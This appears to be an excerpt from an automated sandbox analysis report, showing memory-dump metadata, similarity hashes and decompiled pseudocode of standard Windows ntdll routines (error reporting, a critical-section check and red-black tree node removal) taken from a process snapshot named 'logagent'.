                                              0x051df74f
                                              0x00000000
                                              0x051df74f

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: f83c09ad02752a3b0cd884038e84d474b2972453e6471baee5b7a02a425c615e
                                              • Instruction ID: 50200f0c76c15aee7475b19509a29787f83ceb9b7283126aff16ed08c0036b04
                                              • Opcode Fuzzy Hash: f83c09ad02752a3b0cd884038e84d474b2972453e6471baee5b7a02a425c615e
                                              • Instruction Fuzzy Hash: 8911E9343086428BEBF8AE1CC4547F6F297BB85614F26452AD467CB390D774DA43C360
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05268DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E05268DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5290d50);
				E0520D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05245720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0520DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0520DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0520D130(_t34, _t39, _t40);
			}





                                              0x05268df1
                                              0x05268df1
                                              0x05268df1
                                              0x05268df1
                                              0x05268df1
                                              0x05268df1
                                              0x05268df3
                                              0x05268df8
                                              0x05268dfd
                                              0x05268e00
                                              0x05268e0e
                                              0x05268e2a
                                              0x05268e36
                                              0x05268e38
                                              0x05268e3c
                                              0x05268e46
                                              0x05268e46
                                              0x05268e36
                                              0x05268e50
                                              0x05268e56
                                              0x05268e59
                                              0x05268e5c
                                              0x05268e60
                                              0x05268e67
                                              0x05268e6d
                                              0x05268e73
                                              0x05268e74
                                              0x05268eb1
                                              0x05268ebd

                                              Strings
                                              • Critical error detected %lx, xrefs: 05268E21
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: 10491f94dbc25141db465563cbd6f17eb4e50e25373d7cff16f6382ed7ba88ee
                                              • Instruction ID: b90b34887608b81052cbbb2c1ba9d9e455ea00adf5173c5ee598f6dd10995837
                                              • Opcode Fuzzy Hash: 10491f94dbc25141db465563cbd6f17eb4e50e25373d7cff16f6382ed7ba88ee
                                              • Instruction Fuzzy Hash: E8113975E26348DBDF25CFA4850979DBBF1BF08314F24425DE5696B282C3744641CF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0524FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0524FF60
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: ffcff087498f52766c2b40a65a26a25786273e816b6cbdd3c1dfa98473c8025f
                                              • Instruction ID: a4b6ee740b8e564e0893bb4b86cfaebc27dc3dca22c71c0d5b688727dc1891e4
                                              • Opcode Fuzzy Hash: ffcff087498f52766c2b40a65a26a25786273e816b6cbdd3c1dfa98473c8025f
                                              • Instruction Fuzzy Hash: 6811CE76A31184AFDB1ADB50C989F98BBB2FF48704F158054E1096A2A1CB389940DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BF900 Relevance: .9, Instructions: 863COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 99%
                                              			E051BF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                              0x051bf90b
                                              0x051bf911
                                              0x051bf917
                                              0x051bf919
                                              0x051bf91c
                                              0x05215d63
                                              0x05215d69
                                              0x05215d69
                                              0x05215d63
                                              0x051bf922
                                              0x051bf927
                                              0x05215d72
                                              0x05215d78
                                              0x05215d78
                                              0x05215d72
                                              0x051bf92d
                                              0x051bf931
                                              0x051bfa2d
                                              0x051bfa2d
                                              0x051bf939
                                              0x051bf940
                                              0x051bf944
                                              0x051bfa37
                                              0x051bfa39
                                              0x051bfa3c
                                              0x051bfa3e
                                              0x051bfa41
                                              0x051bfa48
                                              0x051bfe68
                                              0x051bfe6c
                                              0x051bfe6c
                                              0x051bfe78
                                              0x051bfe78
                                              0x051bfe7a
                                              0x051bfe7a
                                              0x051bfe7e
                                              0x051bfe6e
                                              0x051bfe6e
                                              0x051bfe72
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051bfe80
                                              0x051bfe80
                                              0x051bfe83
                                              0x00000000
                                              0x051bfe83
                                              0x05215d7f
                                              0x05215d81
                                              0x00000000
                                              0x00000000
                                              0x05215d87
                                              0x00000000
                                              0x05215d87
                                              0x051bfa4e
                                              0x051bfa50
                                              0x05215d90
                                              0x00000000
                                              0x00000000
                                              0x05215d98
                                              0x051bfa58
                                              0x051bfa58
                                              0x051bfa5d
                                              0x051bfa60
                                              0x051bfa63
                                              0x051bfa69
                                              0x051bfa6b
                                              0x051bfa6e
                                              0x051bfa71
                                              0x05215da1
                                              0x05215da7
                                              0x05215da7
                                              0x05215da1
                                              0x051bfa79
                                              0x051c0071
                                              0x051c0073
                                              0x051c0074
                                              0x00000000
                                              0x051bfa7f
                                              0x051bfa83
                                              0x051bfa85
                                              0x05215dae
                                              0x05215dae
                                              0x051bfa8b
                                              0x051bfa8f
                                              0x051bfa98
                                              0x051bfaa1
                                              0x051bfaa4
                                              0x051bfaa6
                                              0x051bfaa9
                                              0x051bfaac
                                              0x05215db7
                                              0x05215dbd
                                              0x05215dbd
                                              0x05215db7
                                              0x051bfab4
                                              0x00000000
                                              0x051bfaba
                                              0x051bfabc
                                              0x051bfac2
                                              0x051bfac5
                                              0x051bfac7
                                              0x051bfac7
                                              0x051bfad6
                                              0x051bfad9
